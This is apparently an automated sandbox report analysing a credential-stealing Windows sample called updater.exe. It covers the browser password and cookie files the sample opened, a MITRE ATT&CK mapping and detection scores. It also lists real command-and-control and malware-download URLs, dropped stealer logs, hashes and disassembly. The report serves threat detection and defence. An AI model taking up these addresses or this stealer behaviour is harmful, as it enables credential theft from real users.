Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_0143A932
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0143ABD4
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_0143AD45
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0143AC1F
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0143ACBA
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,	1_2_0143AF98
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,	1_2_0143B1C4
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0143B0BE
Source: C:\Users\user\Desktop\updater.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_0143B293
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	1_2_0141D58A
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0142F7EF

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_0141E678 cpuid

1_2_0141E678

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_0142FDA7 GetSystemTimeAsFileTime,

1_2_0142FDA7

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_01433BF4 _free,GetTimeZoneInformation,_free,

1_2_01433BF4

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013E2F5C GetVersionExA,

1_2_013E2F5C

Stealing of Sensitive Information

Yara detected Panda Stealer

Source: Yara match	File source: updater.exe, type: SAMPLE
Source: Yara match	File source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Panda Stealer

Source: Yara match	File source: updater.exe, type: SAMPLE
Source: Yara match	File source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	Path Interception	1 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Man in the Browser	Automated Exfiltration	12 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	1 Data from Local System	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
updater.exe	92%	ReversingLabs	Win32.Trojan.StellarStealer
updater.exe	85%	Virustotal		Browse
updater.exe	100%	Avira	HEUR/AGEN.1305371
updater.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
f0837288.xsph.ru	141.8.192.151	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://f0837288.xsph.ru	false		high
http://f0837288.xsph.ru/collect.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://ac.ecosia.org/autocomplete?q=	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://duckduckgo.com/chrome_newtab	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://duckduckgo.com/ac/?q=	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://www.google.com/favicon.ico	WLDIDRPJXW.PRECQYBSH.1.dr	false	high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.192.151	f0837288.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1266489
Start date and time:	2023-07-04 11:11:03 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	updater.exe
Detection:	MAL
Classification:	mal92.troj.spyw.winEXE@1/5@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 133
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.238.85.254, 8.247.206.254, 8.247.205.254, 8.248.117.254, 8.248.147.254
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:12:04	API Interceptor	57x Sleep call for process: updater.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.192.151	ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe	Get hash	malicious	Azorult	Browse	f0355889.xsph.ru/Panel/index.php
	gOKMPhOLiN.exe	Get hash	malicious	Phoenix Miner, ccminer	Browse	f0758246.xsph.ru//zima.php?mine=ETC
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	dropbox.exe	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	DWG spare parts 455RTMGF Model.exe	Get hash	malicious	Remcos	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	NotaFiscal.msi	Get hash	malicious	Unknown	Browse	f0717271.xsph.ru/serv.php
	Revised sales contract for Crosswear.rtf	Get hash	malicious	Snake Keylogger	Browse	f0705964.xsph.ru/mum.exe
	cxbqjWw79R.exe	Get hash	malicious	Xmrig	Browse	f0702521.xsph.ru/cmd.php?hwid=computer%5Cuser&gpuname=88P9A4OS;%20&mining=1&active=XMR
	IVBPFW.exe	Get hash	malicious	Unknown	Browse	f0702055.xsph.ru/ng.txt
	NOPL-25-JULY-001.doc	Get hash	malicious	Remcos	Browse	f0699262.xsph.ru/letter.exe
	300618c6e81ee458a3aba4188f0f24937f62974991428.exe	Get hash	malicious	RedLine, Remcos, Xmrig	Browse	f0699616.xsph.ru/RATTCRYPT.exe
	http://f0688845.xsph.ru/index.php	Get hash	malicious	Unknown	Browse	f0688845.xsph.ru/favicon.ico
	18561381.exe	Get hash	malicious	RedLine	Browse	f0645594.xsph.ru/build.exe
	bd250e1cb4f8d322a5464549dc067ac7bcbecfc2d4fca.exe	Get hash	malicious	RedLine Remcos Xmrig	Browse	f0641877.xsph.ru/lam1di.exe
	9WPRwZwY47.exe	Get hash	malicious	RedLine	Browse	f0624763.xsph.ru/MicrosoftApi.exe
	2a09Y5NsoG.exe	Get hash	malicious	Amadey RedLine SmokeLoader Tofsee Vidar	Browse	f0611101.xsph.ru/1.exe
	NFe_09112021123.msi	Get hash	malicious	Hidden Macro 4.0	Browse	f0589562.xsph.ru//arqvs//zlibai.dll
	VapeV4Installer (2).exe	Get hash	malicious	Unknown	Browse	f0587499.xsph.ru/dop.exe
	7ofFMoirr5.exe	Get hash	malicious	Raccoon RedLine SmokeLoader	Browse	f0589056.xsph.ru/bfs.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	al7OvZOSKy.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	1iakzzaLRr.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	HEUR-Backdoor.MSIL.LightStone.gen-8e6d8d43b27.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Get hash	malicious	BlackNET	Browse	141.8.197.42
	http://f0827197.xsph.ru/000/0101/battle/?login=john.gdoe@arcadia.io	Get hash	malicious	Unknown	Browse	141.8.192.151
	acctspay ACH_INSTRUCTIONSpdf.shtml	Get hash	malicious	Unknown	Browse	141.8.192.169
	file.exe	Get hash	malicious	Tofsee	Browse	185.185.68.207
	rskovbrand.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	7SzUgdO8Ne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	Archd.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	file.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	Y0VyFqYj2i.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	5zZPgwyy8n.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	vk8Xlb1vw3.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	file.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	file.exe	Get hash	malicious	Amadey, Fabookie, PrivateLoader, RedLine, Tofsee	Browse	185.185.70.73
	Gardenizes.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	ufuldkommenhederne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	file.exe	Get hash	malicious	Tofsee	Browse	185.185.70.73
	file.exe	Get hash	malicious	PSWmarket	Browse	141.8.194.203

Process:	C:\Users\user\Desktop\updater.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	743
Entropy (8bit):	4.529509263761332
Encrypted:	false
SSDEEP:	12:SxPrJi2YSCqTR/Us/5xcIx4ysD8UzmHZEgX56Qi91M:KPV/YueixcIx4ysDL6FX56QiI
MD5:	FCDECECC8C1DF24F7057FA6402F2F561
SHA1:	0837132F80947BA8C1C8802A5FF676599A0210CB
SHA-256:	96840970C25E9DD2CC9D6F9A3E2071FA8391B8B87E40E6C0E1F4EABD0D0790A3
SHA-512:	3A667EB870C2C3E7438F2ECF84152591CD192CC8327E0794EAAC18E09860AE3D940F92E2964202FCFC02AC8AFEA5F871311B5111B269C7ED3B111DBB7AF4AD3A
Malicious:	false
Reputation:	low
Preview:	System hash: b4c8ac298ecd13471647646125ed843d.Build: 1029702468.Version: 1.11.Build name: @traffer.----------------------------------------------------.[BETA BUILD v1.11] COLLECTOR PROJECT.----------------------------------------------------..System: Windows 7 (x64)..AutoFill: 0.Passwords: 0.Cookies: 9.Cards: 0..Atomic: -.Armory: -.Bytecoin: -.BitcoinCore: -.DashCore: -.Litecoin: -.Electrum: -.Zcash: -.Ethereum: -..Authy (2FA): -.Files: 12.FileZilla: -.NordVPN: -.Telegram: -.Discord: -.PSI: -.Wallet: -.Pidgin: -.Steam: -...----------------------------------------------------.Startup path: C:\Users\user\Desktop\updater.exe.Start time: Tue Jul 4 11:12:05 2023.Get log time: 3 sec..----------------------------------------------------..

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\KVRIFTOPKR.WVDLGDUFD

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3024000, page size 32768, file counter 5, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.08108430995212909
Encrypted:	false
SSDEEP:	48:De8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DeUm7ii+7Ue1AQ98VVY
MD5:	2B9F6CFC2BFEAD36B3B619A65FD9759C
SHA1:	78B8225E9B528E5A5EA35EB1649CBDB334A44A3C
SHA-256:	E6C938035A1B57C0A47FB3B55797B6BFA056CC62360F4893F31D8F39102368D4
SHA-512:	97A3B2B689C33502FB25DE2CE42AE4F5F0260F7679A8E36D16782D2775A5BB28B7BC03B0814F5E588C133EB95F6E0E2CA0BD2E7BBCB4838FB29BDEF855D5E9F7
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................$......}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\PKOJNU.IFGHVJFFUC

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	ASCII text, with very long lines (690)
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.0777728481751625
Encrypted:	false
SSDEEP:	24:JLWmPFn+wnlqc8jlwVs3sI2GPfQQttE6sC63tpsC63tGEpDVD:9dlqc8joE2QB1B6nB6UMD
MD5:	C4EF4F766ADD2492805FA188B0D4589D
SHA1:	E01A63D81464C41507E6C08092AEB512D040B3F4
SHA-256:	545570454417671F0DC0A5F67BEB7495FB4329EFCFFEFEDF4AC092D3C13DE327
SHA-512:	6EABC640538BEA2DC27DAAA0A06E75A36B99DC2FD5695D41C5C9F612D48181FB65539B6A1EC2124239824E95C6171809F962F6B2AB8419FA9643A5A594B807D9
Malicious:	false
Reputation:	low
Preview:	www.mozilla.org.FALSE./.0.1510052761.moz-notification-fx-out-of-date.fx-out-of-date-banner..mozilla.org.FALSE./.0.1823598364.optimizelyEndUserId.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598364.optimizelySegments.%7B%22245617832%22%3A%22none%22%2C%22245677587%22%3A%22ff%22%2C%22245875585%22%3A%22direct%22%2C%22246048108%22%3A%22false%22%7D..246059135.log.optimizely.com.FALSE./.0.1823598366.end_user_id.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598366.optimizelyBuckets.%7B%7D..mozilla.org.FALSE./.0.1508238381.optimizelyPendingLogEvents.%5B%22n%3Doptly_activate%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.494%26f%3D8540095929%2C8784714594%26g%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.mozilla.org%252Fen-US%252Ffirefox%252F52.0.1%252Ffirstrun%252F%253Ff%253D102%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.446%26f%3D8540095929%2C8784714594%26g%3D859230343%22%2C%22n%3Dhttps%253A%252F%252Fw

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\QJWTHWRHHQKILSENSBC.KRUUKLJBVDMGTCVO

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1676004
Entropy (8bit):	7.874441819105141
Encrypted:	false
SSDEEP:	49152:806ycPllPGbrowJhiduB2GovOAZYzS1jc/MLa:HnejarhJhiYB2OAZYojiMu
MD5:	F456BD4CCB4FACEDAA45EE16554DE4E6
SHA1:	17C0E109FC80650CFF1158DD6095055F2F9B6061
SHA-256:	6A061B16AAE2F44C722099512366A0739799F61627FE697A685B8ABF001063C6
SHA-512:	F080FCE6FC284B0C3F1E5E46E437FE08C858A81348AC467A50822DA88351A1D75DCCB21D6414282A29F9210440366C569A8FB3C5117A3ED676EBFA985101F0E8
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...UE....!.0...f.....d.l\sZs...Y.(........s...I..0.b..UuW..>}.3...?..}......w.y..sj.......}e(.m..?a(.a..&.O.9.6.>J.?......-.<.JN....S.h8...]...[.1.=.z.0.P...'h.l.b........P..c0q.5..K...Y'FYS.;...X3..;...~[P..@....I..Y...e..:..X.....c...eL^.:5....jt4..D..pN...!.2cZ.....JO.V]...j......Ak.8...R......k.:q$B.dZ.3.w...$.c.Ey..P..m...\..Z..dN....^;....Rq&r/TS..b.:V.............q[.."..g......>..E.z.].-.E9...K......q_.....\.y.. ..m......3....{..x...GR...Wt0.....k...a.".......].ak0..<.9.s].....yf........(.....w?r.p..N..1T..K..m.....l..... .....u...=p.T....'..{kR]G..~.R.c...C9........eN..f....}Bi.a..KqM.W.v..."}jy.......E..\q[..7F;.....q...s.R...1.RZ7..Dk\......[+0..T_Lk.1.8...c..,.?.kZ?..`[.`..Y....%.p...-..>.lk....jd...0.".r..@l..)Z..C...`.~..4E....~....$_...?S.,.7.8!y..q.~8...M..(.~.G.M...3(j.p...a.]..F..P.[.......mLP.@..X..F.6....jk.. .<...

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\WLDIDRPJXW.PRECQYBSH

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 4, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.1340767975888557
Encrypted:	false
SSDEEP:	96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5:	9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1:	56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256:	67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512:	32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.7660386658610205
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	updater.exe
File size:	698'280 bytes
MD5:	5b7111ae32c04c641c56e81a6293ec48
SHA1:	77331d9725c41635d6d449414c8a0d4ee00fac63
SHA256:	4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
SHA512:	d7d9c38e7e909e057c64c091e33cc118df3b7503e11345919613462ed006d91f8b5c8e302b599fb740cb55eb3a4c030fbf5ed5febdb4c2e83752325f26124e78
SSDEEP:	12288:VoJqNIPtNmO6IOOEp0TMlja7NRl2PSVikIyoyueh+AkHcnLwuukoCOD6zlijOz+2:VoJEKZ6IEGTMxapRl2PSwHTehy6B1+p4
TLSH:	93E4C033F0C2C07ED0321032596CEB6259BFF9320A25499BA3C4156E9FB57D29E3665B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..P$...$...$.......4...............0.......8.......%.......u.......3.......)...$...........&.......%...Rich$..................

File Icon


Icon Hash:	aaf3e3e3918382a0

Static PE Info

General

Entrypoint:	0x45e27e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FCCE7D9 [Sun Dec 6 14:16:57 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2a908babc5cc3af850e078751d7de0e9

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	3/4/2020 10:39:47 AM 3/3/2021 10:39:47 AM
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	AAEE394B1087AC1044A13D09468CDF1E
Thumbprint SHA-1:	2485A7AFA98E178CB8F30C9838346B514AEA4769
Thumbprint SHA-256:	C0772D3C9E20C3F4EBB09F5816D6DADA0D8FA86563C2D68898539EC1CD355A1B
Serial:	3300000187721772155940C709000000000187

Entrypoint Preview

Instruction
call 00007FF238A8F2B3h
jmp 00007FF238A8EB09h
cmp ecx, dword ptr [004A2014h]
jne 00007FF238A8EC95h
ret
jmp 00007FF238A8F3D7h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FF238A8EC65h
jmp 00007FF238A8EC70h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004A2014h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004A2014h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004A2014h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa06dc	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa8400	0x23a8	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa7000	0x680c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x992f8	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x99400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x99330	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x87000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x854ec	0x85600	False	0.5623700357310215	data	6.724381241477367	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
